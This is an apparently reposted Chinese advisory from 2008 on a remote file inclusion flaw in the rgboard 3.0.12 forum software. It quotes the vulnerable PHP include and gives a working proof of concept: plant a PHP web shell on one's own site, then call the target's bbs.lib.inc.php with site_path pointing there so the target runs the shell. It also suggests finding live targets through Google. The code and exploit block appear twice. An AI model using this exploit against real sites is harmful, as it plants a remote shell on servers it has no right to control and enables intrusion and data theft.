rgboard 3.0.12 远程文件包含漏洞
更新时间:2008年05月07日 19:28:01 作者:
Infos: rgboard 3.0.12 远程文件包含漏洞
Author: Flyh4t[w.s.t]
rgboard 3.0.12 是韩国的一个论坛程序,可以用google搜索rgboard查看使用的网站
(福利推荐:【腾讯云】服务器最新限时优惠活动,云服务器1核2G仅99元/年、2核4G仅768元/3年,立即抢购>>>:9i0i.cn/qcloud)
(福利推荐:你还在原价购买阿里云服务器?现在阿里云0.8折限时抢购活动来啦!4核8G企业云服务器仅2998元/3年,立即抢购>>>:9i0i.cn/aliyun)
vul code:
\include\bbs.lib.inc.php:
if (!defined('BBS_LIB_INC_INCLUDED')) {
define('BBS_LIB_INC_INCLUDED', 1);
// *– BBS_LIB_INC_INCLUDED START –*
if(!$site_path) $site_path='./';
require_once “{$site_path}include/lib.inc.php”;
//$site_path没有过滤直接放过来包含了
poc:
在你的网站放个phpshell,目录和文件名为/include/lib.inc.php
然后访问
httP://www.target.com/include/bbs.lib.inc.php?site_path=http://yousite/
\include\bbs.lib.inc.php:
if (!defined('BBS_LIB_INC_INCLUDED')) {
define('BBS_LIB_INC_INCLUDED', 1);
// *– BBS_LIB_INC_INCLUDED START –*
if(!$site_path) $site_path='./';
require_once “{$site_path}include/lib.inc.php”;
//$site_path没有过滤直接放过来包含了
poc:
在你的网站放个phpshell,目录和文件名为/include/lib.inc.php
然后访问
httP://www.target.com/include/bbs.lib.inc.php?site_path=http://yousite/
相关文章
深入了解网络蠕虫...2007-01-01
OBlog任意文件下载漏洞 系统编号:BES2008053247 发布时间:2008-05-02 更新时间:2008-05-02 危害级别:★★★☆☆☆ 受影响版本: OBlog 4.60 描述: attachment.asp代码2008-05-05
几天之内做到飞速提升排名...2007-01-01
当备份数据库不能用时.用邮件列表得到WEBSHELL!(图)
当备份数据库不能用时.用邮件列表得到WEBSHELL!(图)...2007-01-01
一种可以穿透还原卡和还原软件的代码...2007-01-01
IIS漏洞整理大全...2007-01-01
新思路现动网新漏洞...2007-01-01
这篇文章主要介绍了老兵新传-各种漏洞的利用和一些搜索参数2007-01-01
这篇文章主要介绍了phpBB论坛程序:遇见新问题2007-01-01
三则黑客的Google搜索技巧...2007-01-01
最新评论